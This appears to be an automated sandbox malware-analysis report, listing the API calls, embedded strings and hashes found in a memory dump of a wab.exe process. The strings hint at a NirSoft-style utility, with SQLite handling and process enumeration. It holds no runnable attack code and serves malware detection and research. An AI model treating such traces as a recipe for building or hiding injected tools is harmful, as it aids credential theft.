                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                              • memcpy.MSVCRT ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              APIs
                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                              • memset.MSVCRT ref: 0040DA23
                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 973020956-4135340389
                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                              APIs
                                                              Strings
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf$wcscpy
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                              • API String ID: 1283228442-2366825230
                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00413972
                                                              • wcscpy.MSVCRT ref: 00413982
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              • wcscpy.MSVCRT ref: 004139D1
                                                              • wcscat.MSVCRT ref: 004139DC
                                                              • memset.MSVCRT ref: 004139B8
                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                              • memset.MSVCRT ref: 00413A00
                                                              • memcpy.MSVCRT ref: 00413A1B
                                                              • wcscat.MSVCRT ref: 00413A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: PD$PD
                                                              • API String ID: 1581201632-2312785699
                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                              • GetParent.USER32(?), ref: 00409FA5
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$wcslen
                                                              • String ID:
                                                              • API String ID: 239872665-3916222277
                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              APIs
                                                              Strings
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • database is already attached, xrefs: 0042F721
                                                              • out of memory, xrefs: 0042F865
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                              • memcpy.MSVCRT ref: 0040EB80
                                                              • memcpy.MSVCRT ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
